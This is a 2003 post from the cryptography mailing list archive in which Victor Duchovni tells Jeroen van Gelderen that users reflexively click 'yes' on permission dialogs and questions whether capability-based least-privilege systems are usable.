[14308] in cryptography@c2.net mail archive
Re: Reliance on Microsoft called risk to U.S. security
daemon@ATHENA.MIT.EDU (Victor.Duchovni@morganstanley.com)
Sat Sep 27 18:20:20 2003
X-Original-To: cryptography@metzdowd.com
X-Original-To: cryptography@metzdowd.com
Date: Sat, 27 Sep 2003 15:48:29 -0400 (EDT)
From: Victor.Duchovni@morganstanley.com
To: "Jeroen C.van Gelderen" <jeroen@vangelderen.org>
Cc: Bill Frantz <frantz@pwpconsult.com>,
Ian Grigg <iang@systemics.com>, cryptography@metzdowd.com
In-Reply-To: <46C3ECBF-F113-11D7-B683-00039375644C@vangelderen.org>
On Sat, 27 Sep 2003, Jeroen C.van Gelderen wrote:
> I continue to believe that few users would grant an email message
> access to both the Internet and the Address Book when they are asked
> those two questions, provided that the user had not been conditioned to
> clicking "YES" in order to get any work done at all.
>
You have not met my users! This is really rather naive. Users don't
understand pop dialogues, they raise their stress level, always clicking
"yes" makes the problem go away.
> There is no way around asking the user because he is the ultimate
> authority when it comes to making trust decisions. (Side-stepping the
> issues in a (corporate) environment where the owner of the machine is
> entitled to restrict its users in any way he sees fit. The point is
> that the software agent cannot make trust decisions.)
>
See above.
> > Also security is not closed under composition, two individually secure
> > components can combine to produce an insecure system. I think that no
> > such secure *non-trivial* least privilege system exists for a
> > graphical general purpose computer either in theory, or in practice.
>
> Are you familiar with the KeyKOS and EROS operating systems and/or
> Stiegler's CapDesk, a secure desktop in Java? They are all based on the
> Principle Of Least Privilege (trough capabilities) and they manage to
> preserve security in the face of composition. Do you consider those
> systems to be trivial, or broken? What is the reason these systems
> cannot exist in theory or practice?
>
What fraction of "real" users will be able to use these systems? Will
users really understand the composition properties of security policies?
--
Victor Duchovni
IT Security,
Morgan Stanley
---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
